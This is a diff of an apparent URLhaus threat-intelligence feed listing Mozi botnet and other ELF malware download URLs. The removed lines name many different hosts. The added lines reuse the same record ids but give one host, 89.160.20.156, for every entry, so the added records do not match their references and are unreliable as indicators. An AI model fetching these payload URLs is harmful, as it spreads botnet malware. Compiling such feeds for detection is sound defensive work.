-{"id":"961252","urlhaus_reference":"https://urlhaus.abuse.ch/url/961252/","url":"http://185.106.46.2:38107/Mozi.m","url_status":"online","host":"185.106.46.2","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961253","urlhaus_reference":"https://urlhaus.abuse.ch/url/961253/","url":"http://123.14.180.59:50354/Mozi.m","url_status":"online","host":"123.14.180.59","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961254","urlhaus_reference":"https://urlhaus.abuse.ch/url/961254/","url":"http://190.140.131.14:44987/Mozi.m","url_status":"online","host":"190.140.131.14","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961249","urlhaus_reference":"https://urlhaus.abuse.ch/url/961249/","url":"http://125.43.33.108:44681/Mozi.m","url_status":"online","host":"125.43.33.108","date_added":"2021-01-14 19:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961250","urlhaus_reference":"https://urlhaus.abuse.ch/url/961250/","url":"http://123.14.65.211:58391/Mozi.m","url_status":"online","host":"123.14.65.211","date_added":"2021-01-14 19:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961248","urlhaus_reference":"https://urlhaus.abuse.ch/url/961248/","url":"http://117.194.164.34:48540/Mozi.a","url_status":"offline","host":"117.194.164.34","date_added":"2021-01-14 19:04:07 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961246","urlhaus_reference":"https://urlhaus.abuse.ch/url/961246/","url":"http://115.48.13.187:42755/Mozi.m","url_status":"online","host":"115.48.13.187","date_added":"2021-01-14 19:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961247","urlhaus_reference":"https://urlhaus.abuse.ch/url/961247/","url":"http://113.87.249.28:52688/Mozi.m","url_status":"online","host":"113.87.249.28","date_added":"2021-01-14 19:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961244","urlhaus_reference":"https://urlhaus.abuse.ch/url/961244/","url":"http://112.30.110.63:33782/Mozi.m","url_status":"online","host":"112.30.110.63","date_added":"2021-01-14 19:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961245","urlhaus_reference":"https://urlhaus.abuse.ch/url/961245/","url":"http://113.133.225.154:50381/Mozi.m","url_status":"online","host":"113.133.225.154","date_added":"2021-01-14 19:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961243","urlhaus_reference":"https://urlhaus.abuse.ch/url/961243/","url":"http://123.14.154.78:44219/Mozi.m","url_status":"online","host":"123.14.154.78","date_added":"2021-01-14 19:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961242","urlhaus_reference":"https://urlhaus.abuse.ch/url/961242/","url":"http://61.53.42.182:36619/bin.sh","url_status":"offline","host":"61.53.42.182","date_added":"2021-01-14 19:01:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]}
-{"id":"961241","urlhaus_reference":"https://urlhaus.abuse.ch/url/961241/","url":"http://115.58.166.75:59976/i","url_status":"online","host":"115.58.166.75","date_added":"2021-01-14 18:56:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]}
-{"id":"961239","urlhaus_reference":"https://urlhaus.abuse.ch/url/961239/","url":"http://59.92.217.228:48688/Mozi.a","url_status":"online","host":"59.92.217.228","date_added":"2021-01-14 18:51:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961240","urlhaus_reference":"https://urlhaus.abuse.ch/url/961240/","url":"http://221.145.179.219:45682/Mozi.m","url_status":"online","host":"221.145.179.219","date_added":"2021-01-14 18:51:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961238","urlhaus_reference":"https://urlhaus.abuse.ch/url/961238/","url":"http://59.99.136.49:34922/Mozi.m","url_status":"offline","host":"59.99.136.49","date_added":"2021-01-14 18:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961233","urlhaus_reference":"https://urlhaus.abuse.ch/url/961233/","url":"http://92.54.237.196:37489/Mozi.m","url_status":"online","host":"92.54.237.196","date_added":"2021-01-14 18:51:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961234","urlhaus_reference":"https://urlhaus.abuse.ch/url/961234/","url":"http://186.33.104.184:51940/Mozi.m","url_status":"online","host":"186.33.104.184","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961235","urlhaus_reference":"https://urlhaus.abuse.ch/url/961235/","url":"http://59.99.40.58:49599/Mozi.a","url_status":"offline","host":"59.99.40.58","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961236","urlhaus_reference":"https://urlhaus.abuse.ch/url/961236/","url":"http://59.99.92.249:53436/Mozi.m","url_status":"offline","host":"59.99.92.249","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961237","urlhaus_reference":"https://urlhaus.abuse.ch/url/961237/","url":"http://58.249.11.35:57237/Mozi.a","url_status":"online","host":"58.249.11.35","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961232","urlhaus_reference":"https://urlhaus.abuse.ch/url/961232/","url":"http://42.224.251.45:50907/Mozi.m","url_status":"online","host":"42.224.251.45","date_added":"2021-01-14 18:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961231","urlhaus_reference":"https://urlhaus.abuse.ch/url/961231/","url":"http://117.208.134.248:41910/Mozi.m","url_status":"online","host":"117.208.134.248","date_added":"2021-01-14 18:50:14 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961229","urlhaus_reference":"https://urlhaus.abuse.ch/url/961229/","url":"http://115.55.93.86:57217/Mozi.m","url_status":"online","host":"115.55.93.86","date_added":"2021-01-14 18:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961230","urlhaus_reference":"https://urlhaus.abuse.ch/url/961230/","url":"http://117.196.50.105:47632/Mozi.m","url_status":"online","host":"117.196.50.105","date_added":"2021-01-14 18:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961227","urlhaus_reference":"https://urlhaus.abuse.ch/url/961227/","url":"http://116.75.197.63:46654/Mozi.a","url_status":"online","host":"116.75.197.63","date_added":"2021-01-14 18:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961228","urlhaus_reference":"https://urlhaus.abuse.ch/url/961228/","url":"http://115.55.33.224:59073/Mozi.m","url_status":"online","host":"115.55.33.224","date_added":"2021-01-14 18:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961221","urlhaus_reference":"https://urlhaus.abuse.ch/url/961221/","url":"http://116.75.192.61:37958/Mozi.a","url_status":"offline","host":"116.75.192.61","date_added":"2021-01-14 18:50:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961222","urlhaus_reference":"https://urlhaus.abuse.ch/url/961222/","url":"http://119.178.250.25:53943/Mozi.m","url_status":"online","host":"119.178.250.25","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961223","urlhaus_reference":"https://urlhaus.abuse.ch/url/961223/","url":"http://115.59.212.117:40404/Mozi.m","url_status":"online","host":"115.59.212.117","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961224","urlhaus_reference":"https://urlhaus.abuse.ch/url/961224/","url":"http://182.114.210.156:46738/Mozi.m","url_status":"online","host":"182.114.210.156","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961225","urlhaus_reference":"https://urlhaus.abuse.ch/url/961225/","url":"http://123.12.231.116:58234/Mozi.m","url_status":"online","host":"123.12.231.116","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961226","urlhaus_reference":"https://urlhaus.abuse.ch/url/961226/","url":"http://182.59.230.66:36911/Mozi.a","url_status":"online","host":"182.59.230.66","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961220","urlhaus_reference":"https://urlhaus.abuse.ch/url/961220/","url":"http://115.207.21.23:35028/Mozi.m","url_status":"online","host":"115.207.21.23","date_added":"2021-01-14 18:49:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961291","urlhaus_reference":"https://urlhaus.abuse.ch/url/961291/","url":"http://89.160.20.156:33946/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961292","urlhaus_reference":"https://urlhaus.abuse.ch/url/961292/","url":"http://89.160.20.156:39990/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961288","urlhaus_reference":"https://urlhaus.abuse.ch/url/961288/","url":"http://89.160.20.156:60558/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961289","urlhaus_reference":"https://urlhaus.abuse.ch/url/961289/","url":"http://89.160.20.156:32989/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961290","urlhaus_reference":"https://urlhaus.abuse.ch/url/961290/","url":"http://89.160.20.156:52458/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:22:04 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961286","urlhaus_reference":"https://urlhaus.abuse.ch/url/961286/","url":"http://89.160.20.156:60735/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961287","urlhaus_reference":"https://urlhaus.abuse.ch/url/961287/","url":"http://89.160.20.156:34755/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961285","urlhaus_reference":"https://urlhaus.abuse.ch/url/961285/","url":"http://89.160.20.156:39290/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961279","urlhaus_reference":"https://urlhaus.abuse.ch/url/961279/","url":"http://89.160.20.156:56141/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961280","urlhaus_reference":"https://urlhaus.abuse.ch/url/961280/","url":"http://89.160.20.156:40247/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961281","urlhaus_reference":"https://urlhaus.abuse.ch/url/961281/","url":"http://89.160.20.156:36619/i","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]}
+{"id":"961282","urlhaus_reference":"https://urlhaus.abuse.ch/url/961282/","url":"http://89.160.20.156:43673/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961283","urlhaus_reference":"https://urlhaus.abuse.ch/url/961283/","url":"http://89.160.20.156:55726/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961284","urlhaus_reference":"https://urlhaus.abuse.ch/url/961284/","url":"http://89.160.20.156:59668/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961278","urlhaus_reference":"https://urlhaus.abuse.ch/url/961278/","url":"http://89.160.20.156:34391/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:19:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961277","urlhaus_reference":"https://urlhaus.abuse.ch/url/961277/","url":"http://89.160.20.156:49478/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:19:06 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961276","urlhaus_reference":"https://urlhaus.abuse.ch/url/961276/","url":"http://89.160.20.156:54670/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961270","urlhaus_reference":"https://urlhaus.abuse.ch/url/961270/","url":"http://89.160.20.156:59599/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961271","urlhaus_reference":"https://urlhaus.abuse.ch/url/961271/","url":"http://89.160.20.156:45189/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961272","urlhaus_reference":"https://urlhaus.abuse.ch/url/961272/","url":"http://89.160.20.156:60805/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961273","urlhaus_reference":"https://urlhaus.abuse.ch/url/961273/","url":"http://89.160.20.156:38888/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961274","urlhaus_reference":"https://urlhaus.abuse.ch/url/961274/","url":"http://89.160.20.156:47869/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961275","urlhaus_reference":"https://urlhaus.abuse.ch/url/961275/","url":"http://89.160.20.156:57478/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961269","urlhaus_reference":"https://urlhaus.abuse.ch/url/961269/","url":"http://89.160.20.156:40256/bin.sh","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]}
+{"id":"961268","urlhaus_reference":"https://urlhaus.abuse.ch/url/961268/","url":"http://89.160.20.156:49035/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961266","urlhaus_reference":"https://urlhaus.abuse.ch/url/961266/","url":"http://89.160.20.156:41531/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961267","urlhaus_reference":"https://urlhaus.abuse.ch/url/961267/","url":"http://89.160.20.156:49596/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:07:04 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961265","urlhaus_reference":"https://urlhaus.abuse.ch/url/961265/","url":"http://89.160.20.156:43584/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:07:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961264","urlhaus_reference":"https://urlhaus.abuse.ch/url/961264/","url":"http://89.160.20.156:44976/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:06:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961259","urlhaus_reference":"https://urlhaus.abuse.ch/url/961259/","url":"http://89.160.20.156:51107/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961260","urlhaus_reference":"https://urlhaus.abuse.ch/url/961260/","url":"http://89.160.20.156:33790/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961261","urlhaus_reference":"https://urlhaus.abuse.ch/url/961261/","url":"http://89.160.20.156:58919/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961262","urlhaus_reference":"https://urlhaus.abuse.ch/url/961262/","url":"http://89.160.20.156:40395/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961263","urlhaus_reference":"https://urlhaus.abuse.ch/url/961263/","url":"http://89.160.20.156:53510/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961258","urlhaus_reference":"https://urlhaus.abuse.ch/url/961258/","url":"http://89.160.20.156:39115/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:05:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961257","urlhaus_reference":"https://urlhaus.abuse.ch/url/961257/","url":"http://89.160.20.156:40713/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:05:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961256","urlhaus_reference":"https://urlhaus.abuse.ch/url/961256/","url":"http://89.160.20.156:54811/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:05:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961255","urlhaus_reference":"https://urlhaus.abuse.ch/url/961255/","url":"http://89.160.20.156:58269/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:05:07 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961251","urlhaus_reference":"https://urlhaus.abuse.ch/url/961251/","url":"http://89.160.20.156:47985/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961252","urlhaus_reference":"https://urlhaus.abuse.ch/url/961252/","url":"http://89.160.20.156:38107/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961253","urlhaus_reference":"https://urlhaus.abuse.ch/url/961253/","url":"http://89.160.20.156:50354/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961254","urlhaus_reference":"https://urlhaus.abuse.ch/url/961254/","url":"http://89.160.20.156:44987/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961249","urlhaus_reference":"https://urlhaus.abuse.ch/url/961249/","url":"http://89.160.20.156:44681/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961250","urlhaus_reference":"https://urlhaus.abuse.ch/url/961250/","url":"http://89.160.20.156:58391/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961248","urlhaus_reference":"https://urlhaus.abuse.ch/url/961248/","url":"http://89.160.20.156:48540/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961246","urlhaus_reference":"https://urlhaus.abuse.ch/url/961246/","url":"http://89.160.20.156:42755/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961247","urlhaus_reference":"https://urlhaus.abuse.ch/url/961247/","url":"http://89.160.20.156:52688/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961244","urlhaus_reference":"https://urlhaus.abuse.ch/url/961244/","url":"http://89.160.20.156:33782/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961245","urlhaus_reference":"https://urlhaus.abuse.ch/url/961245/","url":"http://89.160.20.156:50381/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:04:05 
